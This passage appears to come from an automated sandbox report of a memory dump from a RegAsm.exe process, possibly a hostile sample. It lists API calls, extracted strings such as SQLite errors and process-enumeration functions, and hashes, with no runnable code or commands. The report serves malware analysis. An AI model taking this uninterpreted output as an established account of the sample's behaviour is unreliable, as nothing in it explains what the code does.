                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 290601579-0
                                                                                                                          • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                          • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$wcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3592753638-3916222277
                                                                                                                          • Opcode ID: 6d2ace926fa1fd4fd0b6115da4c515e06a5da4cfb6d7fd53cc3c25480c37732e
                                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                          • Opcode Fuzzy Hash: 6d2ace926fa1fd4fd0b6115da4c515e06a5da4cfb6d7fd53cc3c25480c37732e
                                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040A47B
                                                                                                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                          • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                          • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                          • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                          • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                          APIs
                                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3015003838-0
                                                                                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                          • String ID: strings
                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                          APIs
                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$FreeLoadMessage
                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                          • API String ID: 3897320386-317687271
                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                          • API String ID: 4271163124-70141382
                                                                                                                          • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                          • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                          • API String ID: 4139908857-3953557276
                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                          • memset.MSVCRT ref: 0041BA3D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: -journal$-wal
                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                          • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                          • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                          APIs
                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                          • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4218492932-0
                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: gj
                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4281309102-0
                                                                                                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                          • String ID: 0$6
                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                          • String ID: 6$\
                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesErrorFileLastSleep$free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1470729244-0
                                                                                                                          • Opcode ID: 50043058a1b5c1adbd70e35514f2ed55e6e14a886e8aa5764a6ab2805656462d
                                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                          • Opcode Fuzzy Hash: 50043058a1b5c1adbd70e35514f2ed55e6e14a886e8aa5764a6ab2805656462d
                                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                          APIs
                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1331804452-0
                                                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
